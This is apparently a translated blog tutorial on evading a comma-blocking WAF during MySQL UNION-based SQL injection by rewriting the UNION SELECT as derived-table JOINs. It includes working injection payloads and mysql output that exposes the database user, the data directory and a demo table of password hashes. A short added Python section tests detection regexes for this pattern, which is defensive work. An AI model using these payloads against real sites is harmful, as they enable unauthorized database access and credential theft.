In SQL injection, once the injection point has been identified, the usual next step is a UNION query. First the number of columns is guessed with ORDER BY n, decreasing n until the page returns normally; that gives the number of columns in the current query.
Then UNION SELECT 1,2,3,4,5,6,7..n is used to find the displayed positions, followed by UNION SELECT 1,2,3,4,database(),6,7..n. This is the routine procedure, and the statements contain many commas.
But if a WAF blocks commas, our UNION query is blocked.
To get around that, the JOIN method is used. See my other article for an introduction to JOIN.
It really comes down to a few statements: the displayed positions are replaced with the usual injection variables or other expressions:
union select 1,2,3,4;
union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);
union select * from ((select 1)A join (select 2)B join (select 3)C join (select group_concat(user(),' ',database(),' ',@@datadir))D);
Commonly used database variables:
User() -- current database user
database() -- current database name
Version() -- database version
@@datadir -- database data directory
@@version_compile_os -- operating system version
system_user() -- system user name
current_user() -- current user name
session_user() -- user name of the connecting session
Example:
1. Suppose I have a table user with 5 columns (fields) and 2 rows:
mysql> show tables;
+----------------+
| Tables_in_gogs |
+----------------+
| user           |
| version        |
+----------------+
2 rows in set (0.00 sec)

mysql> desc user;
+--------+--------------+------+-----+---------+----------------+
| Field  | Type         | Null | Key | Default | Extra          |
+--------+--------------+------+-----+---------+----------------+
| id     | bigint(20)   | NO   | PRI | NULL    | auto_increment |
| name   | varchar(255) | NO   | UNI | NULL    |                |
| email  | varchar(255) | NO   |     | NULL    |                |
| passwd | varchar(255) | NO   |     | NULL    |                |
| salt   | varchar(10)  | NO   |     | NULL    |                |
+--------+--------------+------+-----+---------+----------------+
5 rows in set (0.01 sec)

mysql> select id,name,email,passwd from user;
+----+----------+---------------------+------------------------------------------------------------------------------------------------------+
| id | name     | email               | passwd                                                                                               |
+----+----------+---------------------+------------------------------------------------------------------------------------------------------+
| 1  | zhangsan | [email protected] | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e |
| 2  | ihoney   | [email protected] | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af |
+----+----------+---------------------+------------------------------------------------------------------------------------------------------+
2 rows in set (0.00 sec)
2. The part starting with UNION is the statement we inject through the URL. This is only a demonstration; in practice, if the injected statement contains commas it may be blocked.
mysql> select id,name,email,passwd from user union select 1,2,3,4;
+----+----------+---------------------+------------------------------------------------------------------------------------------------------+
| id | name     | email               | passwd                                                                                               |
+----+----------+---------------------+------------------------------------------------------------------------------------------------------+
| 1  | zhangsan | [email protected] | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e |
| 2  | ihoney   | [email protected] | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af |
| 1  | 2        | 3                   | 4                                                                                                    |
+----+----------+---------------------+------------------------------------------------------------------------------------------------------+
3 rows in set (0.00 sec)
3. Continue the injection with JOIN, without any commas
mysql> select id,name,email,passwd from user union select * from ((select 1)A join (select 2)B join (select 3)C join (select 4)D);
+----+----------+---------------------+------------------------------------------------------------------------------------------------------+
| id | name     | email               | passwd                                                                                               |
+----+----------+---------------------+------------------------------------------------------------------------------------------------------+
| 1  | zhangsan | [email protected] | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e |
| 2  | ihoney   | [email protected] | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af |
| 1  | 2        | 3                   | 4                                                                                                    |
+----+----------+---------------------+------------------------------------------------------------------------------------------------------+
3 rows in set (0.00 sec)
4. Once the bypass works, the displayed numeric positions can be replaced to keep extracting database and system information
mysql> select id,name,email,passwd from user union select * from ((select 1)A join (select 2)B join (select 3)C join (select group_concat(user(),' ',database(),' ',@@datadir))D);
+----+----------+---------------------+------------------------------------------------------------------------------------------------------+
| id | name     | email               | passwd                                                                                               |
+----+----------+---------------------+------------------------------------------------------------------------------------------------------+
| 1  | zhangsan | [email protected] | eeb8ecb282bcc107c36d9d46826db5b86b9a9f2d2c2c3df237184d47fa97cee74ebea158bc4b5e27ad4a5f8e0ea925bbcf5e |
| 2  | ihoney   | [email protected] | a0d63e18d85bc5be5d2d133d1c01d33b2c6653e037afd018a1078e4703ac278c51801d47fcaaee7a6ad8a26d6a3373b7d0af |
| 1  | 2        | 3                   | root@localhost gogs /var/lib/mysql/                                                                  |
+----+----------+---------------------+------------------------------------------------------------------------------------------------------+
3 rows in set (0.00 sec)
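From the defensive side, an added example (not code from the original post) of why a WAF rule that only blocks commas is weak: a comma-only rule is compared with a structural rule that matches UNION SELECT and the derived-table JOIN shape from step 3, run over constructed sample values of an injectable parameter.

```python
import re

# Constructed sample values of one request parameter (not taken from the post).
SAMPLES = {
    "classic":    "1 union select 1,2,3,4",
    "join_form":  "1 union select * from ((select 1)A join (select 2)B"
                  " join (select 3)C join (select 4)D)",
    "benign_id":  "42",
    "benign_txt": "join our mailing list",
}

# Rule 1: the naive comma filter the post talks about.
COMMA = re.compile(r",")
# Rule 2: UNION ... SELECT regardless of case and spacing.
UNION_SELECT = re.compile(r"\bunion\b\s+(?:all\s+|distinct\s+)?\bselect\b", re.IGNORECASE)
# Rule 3: the comma-free shape "(select ...)alias join (select ...".
DERIVED_JOIN = re.compile(r"\(\s*select\b[^()]*\)\s*\w*\s*join\s*\(\s*select\b", re.IGNORECASE)


def normalize(value: str) -> str:
    """Collapse inline comments and whitespace so the rules see one canonical form."""
    value = re.sub(r"/\*.*?\*/", " ", value)   # /**/ padding becomes a space
    return re.sub(r"\s+", " ", value).strip()


def comma_rule(value: str) -> bool:
    """The weak rule: block anything containing a comma."""
    return COMMA.search(value) is not None


def structural_rule(value: str) -> bool:
    """Match the query structure instead of a single delimiter character."""
    v = normalize(value)
    return UNION_SELECT.search(v) is not None or DERIVED_JOIN.search(v) is not None


def evaluate(samples=SAMPLES) -> dict:
    """Return {name: (comma_rule_hit, structural_rule_hit)} for every sample."""
    return {name: (comma_rule(v), structural_rule(v)) for name, v in samples.items()}


if __name__ == "__main__":
    for name, hits in evaluate().items():
        print(f"{name:11s} comma_rule={hits[0]!s:5s} structural_rule={hits[1]}")
```

The JOIN form from step 3 passes the comma rule untouched but is still caught by the structural rule, while the two benign values trigger neither.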